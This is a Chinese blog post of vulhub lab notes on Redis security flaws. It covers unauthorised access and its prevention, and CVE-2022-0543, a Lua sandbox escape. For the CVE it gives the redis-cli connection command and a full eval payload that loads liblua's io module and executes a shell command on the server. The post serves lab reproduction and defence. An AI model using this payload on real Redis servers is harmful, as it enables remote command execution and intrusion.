【vulhub】 redis

0x00 4-unacc(未授权访问)

1、介绍

redis默认端口:6379

Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
————————————————
https://blog.csdn.net/ploto_cs/article/details/108489337

2、影响版本

数据库版本在4.x/5.x以下

3、预防

① Redis添加密码验证
② Redis尽量不要在公网开放(限制来源IP)
③ 使用高版本的Redis

4、复现:

docker靶机:172.17.0.1

kali攻击机:192.168.124.9

Redis未授权访问漏洞复现_又菜又爱倒腾的博客-CSDN博客_redis未授权访问漏洞复现

 

 

 0x01 CVE-2022-0543(lua沙盒绕过命令执行)

1、简介

Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。

Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
————————————————
https://blog.csdn.net/qq_20737293/article/details/123745920

2、影响范围

        2.2 <= redis < 5.0.13

        2.2 <= redis < 6.0.15

        2.2 <= redis < 6.2.5

3、复现

Kali安装redis-cli工具 apt-get install redis-server

使用redis-cli工具连接redis数据库

redis-cli -h 靶机ip –p 6379

发送恶意代码,可以看到回显数据为执行命令id的内容

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值